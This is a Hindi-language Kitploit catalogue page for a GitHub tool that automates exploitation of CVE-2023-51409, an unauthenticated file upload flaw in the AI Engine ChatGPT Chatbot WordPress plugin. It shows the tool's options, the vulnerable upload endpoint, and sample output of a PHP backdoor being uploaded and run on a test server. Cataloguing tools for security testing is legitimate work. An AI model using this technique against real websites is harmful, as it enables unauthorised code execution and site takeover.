Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-51409 — स्वचालित शोषण CVE-2023-51409 के लिए, AI Engine ChatGPT Chatbot WordPress प्लगइन में एक अप्रमाणित मनमाना फ़ाइल अपलोड कमजोरी, जो PHP बैकडोर तैनाती को सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2023-51409
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubnxploited/cve-2023-51409

CVE-2023-51409

स्वचालित शोषण CVE-2023-51409 के लिए, AI Engine ChatGPT Chatbot WordPress प्लगइन में एक अप्रमाणित मनमाना फ़ाइल अपलोड कमजोरी, जो PHP बैकडोर तैनाती को सक्षम करता है।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-51409

AI Engine: ChatGPT Chatbot <= 1.9.98 - बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड rest_upload के माध्यम से

विवरण

यह एक दुर्भावनापूर्ण अभिकर्ता को आपकी वेबसाइट पर किसी भी प्रकार की फ़ाइल अपलोड करने की अनुमति दे सकता है। इसमें बैकडोर शामिल हो सकते हैं जिन्हें निष्पादित करके आपकी वेबसाइट तक अतिरिक्त पहुँच प्राप्त की जा सकती है।

उपयोग:

root@kitploit:~
options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress instance.
  -code PHP_CODE, --php_code PHP_CODE
  PHP code to upload (default, id).

परिणाम

root@kitploit:~
[INFO] Initiating version check for target.
[INFO] Target plugin version detected: 1.9.98
[VULNERABLE] Detected vulnerable plugin version. Proceeding with exploitation.
[INFO] Target is vulnerable. Proceeding with file upload.
[INFO] Attempting to upload file: Nxploit.php to endpoint: http://192.168.100.74:888/wordpress/wp-json/mwai-ui/v1/files/upload
[SUCCESS] File uploaded successfully! Accessible at: http://192.168.100.74:888/wordpress/wp-content/uploads/2025/01/Nxploit.php
[INFO] Exploitation complete. Uploaded file URL: http://192.168.100.74:888/wordpress/wp-content/uploads/2025/01/Nxploit.php

डिफ़ॉल्ट PHP कोड

root@kitploit:~
id 
uid=1(daemon) gid=1(daemon) groups=1(daemon)
टूल डाउनलोड करें